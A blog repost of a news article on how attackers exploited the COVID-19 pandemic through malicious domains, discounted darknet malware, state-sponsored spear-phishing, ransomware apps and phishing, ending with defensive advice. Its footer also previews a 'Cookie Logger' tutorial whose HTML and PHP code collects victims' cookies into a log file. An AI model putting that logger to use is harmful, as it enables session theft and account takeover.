Skip to main content

Thousands of Coronavirus (COVID-19) Related Sites As Bait by Hackers

By
coronavirus malware attacks

As the world comes to grips with the coronavirus pandemic, the situation has proven to be a blessing in disguise for threat actors, who've taken advantage of the opportunity to target victims with scams or malware campaigns.

Now, according to a new report published by Check Point Research today and shared with The Hacker News, hackers are exploiting the COVID-19 outbreak to spread their own infections, including registering malicious Coronavirus-related domains and selling discounted off-the-shelf malware in the dark web.

 "Special offers by different hackers promoting their 'goods' — usually malicious malware or exploit tools — are being sold over the darknet under special offers with 'COVID19' or 'coronavirus' as discount codes, targeting wannabe cyber-attackers," the cybersecurity firm said.

COVID-19 Discounts: Exploit Tools for Sale


The report comes following an uptick in the number of malicious coronavirus-related domains that have been registered since the start of January.

coronavirus malware domains

"In the past three weeks alone (since the end of February 2020), we have noticed a huge increase in the number of domains registered — the average number of new domains is almost 10 times more than the average number found in previous weeks," the researchers said. "0.8 percent of these domains were found to be malicious (93 websites), and another 19 percent were found to be suspicious (more than 2,200 websites)."

Some of the tools available for purchase at a discounted price include "WinDefender bypass" and "Build to bypass email and chrome security."

malware attack

Another hacking group, which goes by the moniker "SSHacker," is offering the service of hacking into Facebook account for a 15 percent discount with "COVID-19" promo code.

 What's more, a seller that goes by the name of "True Mac" is selling a 2019 MacBook Air model for a mere $390 as a "corona special offer." It goes without saying the offer is a scam.

A Long List of Coronavirus-Themed Attacks


The latest development adds to a long list of cyberattacks against hospitals and testing centers, phishing campaigns that distribute malware such as AZORuItEmotetNanocore RAT and TrickBot via malicious links and attachments, and execute malware and ransomware attacks that aim to profit off the global health concern.


  • APT36, a Pakistani state-sponsored threat actor that targets the defense, embassies, and the government of India, was found running a spear-phishing campaign using Coronavirus-themed document baits that masqueraded as health advisories to deploy the Crimson Remote Administration Tool (RAT) onto target systems.
  • Researchers from security firm IssueMakersLab uncovered a malware campaign launched by North Korean hackers that used boobytrapped documents detailing South Korea's response to the COVID-19 epidemic as a lure to drop BabyShark malware. Recorded Future observed, "at least three cases where reference to COVID-19 has been leveraged by possible nation-state actors."
  • A COVID-19-themed malspam campaign targeted the manufacturing, industrial, finance, transportation, pharmaceutical, and cosmetic industries via Microsoft Word documents that exploits a two-and-a-half-year-old Microsoft Office bug in Equation Editor to install AZORult malware. The AZORult info stealer has also been distributed using a fraudulent version of the Johns Hopkins Coronavirus Map in the form of a malicious executable.
  • A fake real-time coronavirus tracking Android app, called "COVID19 Tracker," was found to abuse user permissions to change the phone's lock screen password and install CovidLock ransomware in return for a $100 bitcoin ransom.
  • Another phishing attack, uncovered by Abnormal Security, targeted students and university staff with bogus emails in a bid to steal their Office 365 credentials by redirecting unsuspecting victims to a fake Office 365 login page.
  • Comment spamming attacks on websites that contained links to a seemingly innocuous coronavirus information website but redirected users to dubious drug-selling businesses.
  • Aside from malware-laden spam emails, F-Secure researchers have observed a new spam campaign that aims to capitalize on the widespread mask shortage to trick recipients into paying for masks, only to send them nothing.


Staying Secure in the Time of COVID-19


It's amply clear that these attacks exploit coronavirus fears and people's hunger for information about the outbreak. Given the impact on the security of businesses and individuals alike, it's essential to avoid falling victim to online scams and practice good digital hygiene:


  • Businesses should ensure that secure remote access technologies are in place and configured correctly, including the use of multi-factor authentication, so that employees can conduct business just as securely from home.
  • Individuals should keep away from using unauthorized personal devices for work, and ensure "personal devices will need to have the same level of security as a company-owned device, and you will also need to consider the privacy implications of employee-owned devices connecting to a business network."
  • Watch out for emails and files received from unknown senders. Most importantly, check a sender's email address for authenticity, don't open unknown attachments or click on suspicious links, and avoid emails that ask them to share sensitive data such as account passwords or bank information.
  • Use trusted sources, such as legitimate government websites — for up-to-date, fact-based information about COVID-19.


Labels:

Comments

Post a Comment

Popular posts from this blog

10 Best Forum Software For Webmasters

By
10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h
Post a Comment
Read more

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more